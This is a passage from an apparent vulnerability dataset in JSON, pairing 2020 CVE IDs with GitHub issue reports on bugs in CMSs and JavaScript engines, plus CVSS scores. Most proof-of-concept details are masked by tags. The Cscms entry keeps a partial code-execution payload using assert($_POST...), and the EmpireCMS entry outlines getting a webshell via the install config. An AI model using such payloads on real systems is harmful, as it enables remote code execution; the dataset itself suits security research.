  54968. "Issue_Url_old": "https://github.com/b2evolution/b2evolution/issues/102",
  54969. "Issue_Url_new": "https://github.com/b2evolution/b2evolution/issues/102",
  54970. "Repo_new": "b2evolution/b2evolution",
  54971. "Issue_Created_At": "2020-04-27T13:48:14Z",
  54972. "description": "Multiple vulnerabilies in b2evolution version NUMBERTAG stable. Hi MENTIONTAG We have identified the following vulnerabilities in version NUMBERTAG stable: Open redirect Multiple XSS Please check your mail for more information.",
  54973. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  54974. "severity": "MEDIUM",
  54975. "baseScore": 6.1,
  54976. "impactScore": 2.7,
  54977. "exploitabilityScore": 2.8
  54978. },
  54979. {
  54980. "CVE_ID": "CVE-2020-22848",
  54981. "Issue_Url_old": "https://github.com/chshcms/cscms/issues/6",
  54982. "Issue_Url_new": "https://github.com/chshcms/cscms/issues/6",
  54983. "Repo_new": "chshcms/cscms",
  54984. "Issue_Created_At": "2020-04-13T10:04:37Z",
  54985. "description": "Cscms NUMBERTAG has code execution vulnerability NUMBERTAG APITAG summary Vulnerability APITAG NUMBERTAG has code execution vulnerabilities Report date NUMBERTAG Exploit Author: Zhou Zi Qiao Product Home: FILETAG Software link: FILETAG Version NUMBERTAG APITAG overview Vulnerability PATHTAG Vulnerability function\uff1aindex ERRORTAG Get the id parameter here and assign it to the array $ zdy , and bring it into the function plub_show . this APITAG APITAG APITAG Follow up this function and find that the $ zdy (ie $ fidetpl) we passed in will be analyzed and added to the $ APITAG variable CODETAG There is such a judgment at the end CODETAG $return==FALSE entered the branch and executed $this APITAG APITAG Follow up this function and find that the labelif2 function is called on the first line. Perform some judgments and finally execute the eval function, resulting in code execution. ERRORTAG NUMBERTAG ulnerability exploitation URLTAG FILETAG Front end getshell (need to open the dance section) payload: URLTAG {toif:assert($_POST FILETAG or payload\uff1a URLTAG {toif:assert($_POST FILETAG",
  54986. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  54987. "severity": "CRITICAL",
  54988. "baseScore": 9.8,
  54989. "impactScore": 5.9,
  54990. "exploitabilityScore": 3.9
  54991. },
  54992. {
  54993. "CVE_ID": "CVE-2020-22864",
  54994. "Issue_Url_old": "https://github.com/froala/wysiwyg-editor/issues/3880",
  54995. "Issue_Url_new": "https://github.com/froala/wysiwyg-editor/issues/3880",
  54996. "Repo_new": "froala/wysiwyg-editor",
  54997. "Issue_Created_At": "2020-04-16T15:51:52Z",
  54998. "description": "XSS vulnerability in insert video] . Steps to reproduce the problem NUMBERTAG Go to the Official demo [ URLTAG url APITAG on the +] button APITAG on [insert video] button APITAG on APITAG Code] button APITAG the payload CODETAG Recording. [ URLTAG url",
  54999. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  55000. "severity": "MEDIUM",
  55001. "baseScore": 6.1,
  55002. "impactScore": 2.7,
  55003. "exploitabilityScore": 2.8
  55004. },
  55005. {
  55006. "CVE_ID": "CVE-2020-22874",
  55007. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/5",
  55008. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/5",
  55009. "Repo_new": "pcmacdon/jsish",
  55010. "Issue_Created_At": "2020-04-13T14:03:30Z",
  55011. "description": "integer overflow and buffer overflow. Enviroment APITAG poc: ERRORTAG vulnerability description: FILETAG In APITAG len is the length of the Array, and the APITAG is initially set to a maximum value by o.length. After the calculation of the code, nsiz is calculated as a negative number, which can bypass the two checks of line NUMBERTAG and line NUMBERTAG FILETAG APITAG will get a smaller size of heap space, and then memset assigns a value to the space pointed to by APITAG , but this time has exceeded the actual heap range of APITAG , causing heap overflow .",
  55012. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  55013. "severity": "CRITICAL",
  55014. "baseScore": 9.8,
  55015. "impactScore": 5.9,
  55016. "exploitabilityScore": 3.9
  55017. },
  55018. {
  55019. "CVE_ID": "CVE-2020-22875",
  55020. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/10",
  55021. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/10",
  55022. "Repo_new": "pcmacdon/jsish",
  55023. "Issue_Created_At": "2020-04-13T14:23:26Z",
  55024. "description": "integer overflow. Enviroment APITAG poc: ERRORTAG The vulnerability code is in line src / APITAG NUMBERTAG the function APITAG , the vulnerability code is as follows: FILETAG The curlen here is also the size of the array, and can be arbitrarily set in the js code, for example in the poc FILETAG The affected code is in the analytic function APITAG , as shown in the figure: FILETAG The actual array size len is larger than APITAG , which triggers the assert.",
  55025. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  55026. "severity": "CRITICAL",
  55027. "baseScore": 9.8,
  55028. "impactScore": 5.9,
  55029. "exploitabilityScore": 3.9
  55030. },
  55031. {
  55032. "CVE_ID": "CVE-2020-22876",
  55033. "Issue_Url_old": "https://github.com/ldarren/QuickJS/issues/11",
  55034. "Issue_Url_new": "https://github.com/ldarren/quickjs/issues/11",
  55035. "Repo_new": "ldarren/quickjs",
  55036. "Issue_Created_At": "2020-04-14T15:21:38Z",
  55037. "description": "stack overflow. Enviroment APITAG poc: ERRORTAG vulnerability description: ASAN:SIGSEGV APITAG NUMBERTAG ERROR: APITAG stack overflow on address NUMBERTAG ffd NUMBERTAG ebfb8 (pc NUMBERTAG fc NUMBERTAG b NUMBERTAG bp NUMBERTAG ffd NUMBERTAG ec NUMBERTAG sp NUMBERTAG ffd NUMBERTAG ebfa0 T NUMBERTAG fc NUMBERTAG b NUMBERTAG in malloc ( PATHTAG NUMBERTAG d NUMBERTAG c in js_def_malloc PATHTAG NUMBERTAG b6c in js_malloc_rt PATHTAG NUMBERTAG b6c in js_mallocz_rt PATHTAG NUMBERTAG b6c in js_mallocz PATHTAG NUMBERTAG e2a NUMBERTAG in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG NUMBERTAG ca NUMBERTAG in APITAG PATHTAG NUMBERTAG d0d6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG f in async_func_resume PATHTAG NUMBERTAG e NUMBERTAG f in js_async_function_resume PATHTAG NUMBERTAG e NUMBERTAG a in APITAG PATHTAG SUMMARY: APITAG stack overflow NUMBERTAG malloc NUMBERTAG ABORTING",
  55038. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55039. "severity": "HIGH",
  55040. "baseScore": 7.5,
  55041. "impactScore": 3.6,
  55042. "exploitabilityScore": 3.9
  55043. },
  55044. {
  55045. "CVE_ID": "CVE-2020-22882",
  55046. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/351",
  55047. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/351",
  55048. "Repo_new": "moddable-opensource/moddable",
  55049. "Issue_Created_At": "2020-04-17T16:01:51Z",
  55050. "description": "Type confusion vulnerability. Enviroment CODETAG poc ERRORTAG vulnerability description: The stack traceback is shown in the figure: FILETAG When processing js code, first APITAG will be called to generate a node tree, And when met: FILETAG It can cause errors in object references, which can cause type confusion. The specific vulnerability trigger point is on line APITAG NUMBERTAG as shown in the figure FILETAG The current item is considered a temporary function type that has been declared, but in fact it is an undefined array type in poc. APITAG construction FILETAG Simply assign a value to an undefined array.",
  55051. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55052. "severity": "HIGH",
  55053. "baseScore": 7.5,
  55054. "impactScore": 3.6,
  55055. "exploitabilityScore": 3.9
  55056. },
  55057. {
  55058. "CVE_ID": "CVE-2020-22884",
  55059. "Issue_Url_old": "https://github.com/espruino/Espruino/issues/1799",
  55060. "Issue_Url_new": "https://github.com/espruino/espruino/issues/1799",
  55061. "Repo_new": "espruino/espruino",
  55062. "Issue_Created_At": "2020-04-15T16:09:44Z",
  55063. "description": "buffer overflow. Enviroment APITAG poc: ERRORTAG vulnerability description: The poc will cause the memory corruption of the parser. Below is the output of ASAN\uff1a ERRORTAG",
  55064. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  55065. "severity": "CRITICAL",
  55066. "baseScore": 9.8,
  55067. "impactScore": 5.9,
  55068. "exploitabilityScore": 3.9
  55069. },
  55070. {
  55071. "CVE_ID": "CVE-2020-22885",
  55072. "Issue_Url_old": "https://github.com/ccxvii/mujs/issues/133",
  55073. "Issue_Url_new": "https://github.com/ccxvii/mujs/issues/133",
  55074. "Repo_new": "ccxvii/mujs",
  55075. "Issue_Created_At": "2020-04-17T06:37:43Z",
  55076. "description": "stack overflow. Enviroment APITAG poc: ERRORTAG vulnerability description: Poc will cause stack overflow. As shown below: ERRORTAG",
  55077. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55078. "severity": "HIGH",
  55079. "baseScore": 7.5,
  55080. "impactScore": 3.6,
  55081. "exploitabilityScore": 3.9
  55082. },
  55083. {
  55084. "CVE_ID": "CVE-2020-22886",
  55085. "Issue_Url_old": "https://github.com/ccxvii/mujs/issues/134",
  55086. "Issue_Url_new": "https://github.com/ccxvii/mujs/issues/134",
  55087. "Repo_new": "ccxvii/mujs",
  55088. "Issue_Created_At": "2020-04-17T14:17:17Z",
  55089. "description": "stack overflow. Enviroment APITAG poc ERRORTAG vulnerability description: Poc will cause stack overflow. As shown below: ERRORTAG",
  55090. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55091. "severity": "HIGH",
  55092. "baseScore": 7.5,
  55093. "impactScore": 3.6,
  55094. "exploitabilityScore": 3.9
  55095. },
  55096. {
  55097. "CVE_ID": "CVE-2020-22907",
  55098. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/16",
  55099. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/16",
  55100. "Repo_new": "pcmacdon/jsish",
  55101. "Issue_Created_At": "2020-05-20T14:49:25Z",
  55102. "description": "heap overflow. Enviroment APITAG poc: ERRORTAG vulnerability description Below is the ASAN output, We can find that the code has a heap overflow in jsi_evalcode_sub APITAG FILETAG FILETAG",
  55103. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  55104. "severity": "HIGH",
  55105. "baseScore": 7.5,
  55106. "impactScore": 3.6,
  55107. "exploitabilityScore": 3.9
  55108. },
  55109. {
  55110. "CVE_ID": "CVE-2020-22937",
  55111. "Issue_Url_old": "https://github.com/leadscloud/EmpireCMS/issues/4",
  55112. "Issue_Url_new": "https://github.com/leadscloud/empirecms/issues/4",
  55113. "Repo_new": "leadscloud/empirecms",
  55114. "Issue_Created_At": "2020-04-21T12:03:46Z",
  55115. "description": "Code Injection APITAG Brief of this vulnerability APITAG , when installing cms you can write PHP code to config file and execute arbitrary PHP code. Test Environment Windows NUMBERTAG PHP APITAG Affect version APITAG NUMBERTAG ulnerable Code APITAG CODETAG Table prefix of database with APITAG APITAG APITAG APITAG ERRORTAG function APITAG will parse APITAG to APITAG and then update the config file by call APITAG ERRORTAG APITAG will parse mydbtbpre into APITAG then write APITAG into APITAG Vulnerability display When install cms, set APITAG FILETAG Trigger vulnerability FILETAG Vulnerability description && Fix suggestion The attacker can write malicious PHP code to the config file through install file and execute to obtain webshell. Add PHP character filter in install file. And restrict file execution permissions and directories.",
  55116. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  55117. "severity": "CRITICAL",
  55118. "baseScore": 9.8,
  55119. "impactScore": 5.9,
  55120. "exploitabilityScore": 3.9
  55121. },
  55122. {
  55123. "CVE_ID": "CVE-2020-23015",
  55124. "Issue_Url_old": "https://github.com/opnsense/core/issues/4061",
  55125. "Issue_Url_new": "https://github.com/opnsense/core/issues/4061",
  55126. "Repo_new": "opnsense/core",
  55127. "Issue_Created_At": "2020-04-24T17:37:52Z",
